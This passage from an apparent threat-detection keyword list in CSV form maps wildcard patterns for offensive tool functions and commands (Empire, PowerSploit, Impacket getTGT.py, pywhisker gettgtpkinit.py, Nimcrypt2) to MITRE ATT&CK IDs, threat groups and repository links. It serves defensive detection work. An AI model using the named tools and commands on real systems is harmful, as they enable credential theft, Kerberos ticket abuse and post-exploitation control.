","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1121","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SiteListPassword*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*getsploit*","offensive_tool_keyword","getsploit","Command line search and download tool for Vulners Database inspired by searchsploit. It allows you to search online for the exploits across all the most popular collections: Exploit-DB. Metasploit. 
Packetstorm and others. The most powerful feature is immediate exploit source download right in your working path.","T1583 - T1584 - T1586","TA0007","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/getsploit","1","0","N/A","N/A","10","1668","255","2023-03-27T15:18:55Z","2017-06-04T09:31:44Z" +"*Get-SPN.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1114","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-spns All*","offensive_tool_keyword","DelegationBOF","This tool uses 
LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*get-spns ASREP*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*get-spns spns*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*Get-SQLInstanceDomain*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SQLInstanceDomain.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SQLInstanceDomain.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1082","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SqlServerLinkCrawl*","offensive_tool_keyword","AD exploitation cheat sheet","Automatically find all linked databases","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-SQLServerLoginDefaultPw*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLServerLoginDefaultPw.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SQLServerLoginDefaultPw*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1097","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SQLSysadminCheck*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLServerLoginDefaultPw.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getST.py -k -no-pass -spn*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*GetSyscallStub.nim*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 
tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" +"*Get-System.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SystemDNSServer.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SystemDNSServer.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SystemNamedPipe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getTGT.py -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*getTGT.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*gettgtpkinit.py -cert-pfx *","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*gettgtpkinit.py -cert-pfx*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*gettgtpkinit.py -pfx-base64 *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*gettgtpkinit.py*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" 
+"*Get-TimedScreenshot*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-UnattendSensitiveData*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Get-UnquotedService*","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-USBKeystrokes*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1152","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-UserBadPwdCount*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
